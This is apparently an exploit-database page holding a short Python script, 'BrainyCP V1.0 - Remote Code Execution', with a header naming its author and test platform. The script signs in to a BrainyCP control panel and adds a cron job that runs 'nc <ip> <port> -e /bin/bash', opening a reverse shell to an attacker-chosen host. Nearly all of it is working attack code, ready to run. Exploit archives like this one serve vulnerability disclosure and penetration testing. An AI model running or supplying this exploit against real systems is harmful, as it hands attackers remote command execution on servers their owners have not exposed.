0cb2c9699d
8 changes to exploits/shellcodes/ghdb Roxy Fileman 1.4.5 - Arbitrary File Upload Paradox Security Systems IPR512 - Denial Of Service WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE Microsoft Edge (Chromium-based) Webview2 1.0.1661.34 - Spoofing BrainyCP V1.0 - Remote Code Execution Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE) ever gauzy v0.281.9 - JWT weak HMAC secret
47 lines
No EOL
1.2 KiB
Python
Executable file
47 lines
No EOL
1.2 KiB
Python
Executable file
# Exploit Title: BrainyCP V1.0 - Remote Code Execution
|
|
# Date: 2023-04-03
|
|
# Exploit Author: Ahmet Ümit BAYRAM
|
|
# Vendor Homepage: https://brainycp.io
|
|
# Demo: https://demo.brainycp.io
|
|
# Tested on: Kali Linux
|
|
# CVE : N/A
|
|
|
|
import requests
|
|
|
|
# credentials
|
|
url = input("URL: ")
|
|
username = input("Username: ")
|
|
password = input("Password: ")
|
|
ip = input("IP: ")
|
|
port = input("Port: ")
|
|
|
|
# login
|
|
session = requests.Session()
|
|
login_url = f"{url}/auth.php"
|
|
login_data = {"login": username, "password": password, "lan": "/"}
|
|
response = session.post(login_url, data=login_data)
|
|
if "Sign In" in response.text:
|
|
print("[-] Wrong credentials or may the system patched.")
|
|
exit()
|
|
|
|
|
|
# reverse shell
|
|
reverse_shell = f"nc {ip} {port} -e /bin/bash"
|
|
|
|
# request
|
|
add_cron_url = f"{url}/index.php?do=crontab&subdo=ajax&subaction=addcron"
|
|
add_cron_data = {
|
|
"cron_freq_minutes": "*",
|
|
"cron_freq_minutes_own": "",
|
|
"cron_freq_hours": "*",
|
|
"cron_freq_hours_own": "",
|
|
"cron_freq_days": "*",
|
|
"cron_freq_days_own": "",
|
|
"cron_freq_months": "*",
|
|
"cron_freq_weekdays": "*",
|
|
"cron_command": reverse_shell,
|
|
"cron_user": username,
|
|
}
|
|
response = session.post(add_cron_url, data=add_cron_data)
|
|
|
|
print("[+] Check your listener!") |